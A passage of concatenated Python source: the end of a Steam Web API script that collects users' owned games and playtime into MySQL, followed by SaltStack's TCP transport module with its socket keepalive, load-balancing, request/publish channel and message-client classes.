url = 'http://api.steampowered.com/IPlayerService/GetOwnedGames/v0001/',
params = {
'key' : api_key,
'steamid' : user_id,
'include_played_free_games': True,
'format' : 'json'
}
)
dic_owned_games = r.json().get('response').get('games')
dic_temp[user_id] = dic_owned_games
time.sleep(.5)
break
except Exception as e:
print(user_id, e)
time.sleep(5)
q.put(dic_temp)
def get_owned_games():
config = yaml.safe_load(open('config.yaml'))
api_key = config['steam']['api_key']
if not api_key:
return "No API Key found!"
dic_owned_games = {}
with open('../data/steam_user_id.txt', 'r') as f:
lst_user_id = [i.strip() for i in f.readlines()]
print("The number of user ids: {}".format(len(lst_user_id)))
for lst_user_id_chunk in list(split_list(lst_user_id, 500)):
lst_thread = []
q = queue.Queue()
for i in list(split_list(lst_user_id_chunk, 100)):
t = threading.Thread(target = worker_get_owned_games, args = (i, api_key, q,))
lst_thread.append(t)
for i in lst_thread:
i.start()
for i in lst_thread:
i.join()
while not q.empty():
dic_owned_games.update(q.get())
with open('../data/steam_owned_games.txt', 'w') as f:
for k,v in dic_owned_games.items():
f.write(json.dumps({k:v}))
f.write('\n')
def save_owned_games():
config = yaml.safe_load(open('config.yaml'))
db_username = config['mysql']['username']
db_password = config['mysql']['password']
db_endpoint = config['mysql']['endpoint']
db_database = config['mysql']['database']
engine = create_engine('mysql+pymysql://{}:{}@{}/{}?charset=utf8mb4'.format(db_username, db_password, db_endpoint, db_database))
dic_owned_games = {}
with open('../data/steam_owned_games.txt', 'r') as f:
for raw_string in f.readlines():
user_id, lst_inventory = list(json.loads(raw_string).items())[0]
if lst_inventory:
for i in lst_inventory:
app_id = i.get('appid')
playtime_forever = i.get('playtime_forever', 0)
if playtime_forever > 0:
dic_owned_games.update({
(user_id, app_id) : {
'user_id' : user_id,
'app_id' : app_id,
'playtime_forever' : playtime_forever
}
})
df_owned_games = pd.DataFrame.from_dict(dic_owned_games, 'index')
df_owned_games.to_sql(
'game_steam_user',
engine,
if_exists='replace',
index=False,
dtype={
'user_id': BigInteger(),
'app_id': Integer(),
'playtime_forever': Integer()
},
chunksize = 10000
)
save_owned_games()
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP # nosec
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
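# Illustrative opts for _set_tcp_keepalive (keys taken from the checks above,
# values assumed): {"tcp_keepalive": True, "tcp_keepalive_idle": 300,
# "tcp_keepalive_cnt": 5, "tcp_keepalive_intvl": 60}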
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
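# Note (added for clarity): the accepted (connection, address) tuples placed
# on socket_queue above are consumed by LoadBalancerWorker.socket_queue_thread()
# further down in this module, which hands each socket to the tornado IOLoop
# via _handle_connection().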
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = dict(opts)
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urllib.parse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(
self.opts,
master_host,
int(master_port),
),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# pylint: disable=W1701
def __del__(self):
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If it's not a bad file descriptor error, re-raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# We may not always get data back; for example, a salt-call return
# submission is a blind communication: we do not subscribe to return
# events, we just upload the results to the master.
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
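# Usage sketch (illustrative, not from the original source): this channel is
# asynchronous, so synchronous callers typically wrap it, e.g.
#     req_channel = salt.utils.asynchronous.SyncWrapper(
#         AsyncTCPReqChannel, (opts,), loop_kwarg="io_loop")
#     req_channel.send(load, timeout=60)
# which is the same pattern AsyncTCPPubChannel.connect_callback() uses below.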
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel,
(self.opts,),
loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed"
" out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, then since the req_server is also handling this socket, calling
# req_server.stop() would make tornado raise an AssertionError: it tries to
# match socket.fileno() (which is -1 after close) against the fd it holds in
# its _sockets cache so it can remove the socket from the IOLoop handlers.
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.write(salt.transport.frame.frame_msg("bad load: id contains a null byte", header=header))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.write(salt.transport.frame.frame_msg("bad load: id {} is not a string".format(id_), header=header))
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
salt.transport.frame.frame_msg(
self._encrypt_private(
ret,
req_opts["key"],
req_opts["tgt"],
),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
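# Note (added for clarity): both send() and write_to_stream() above pick the
# pooled client with the shortest send_queue, so writes are spread across the
# pool rather than serialized on a single connection.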
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
self.backoff = opts.get("tcp_reconnect_backoff", 1)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading"
" Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to"
" %s:%s: %r, will reconnect in %d seconds",
self.host,
self.port,
exc,
self.backoff,
)
yield salt.ext.tornado.gen.sleep(self.backoff)
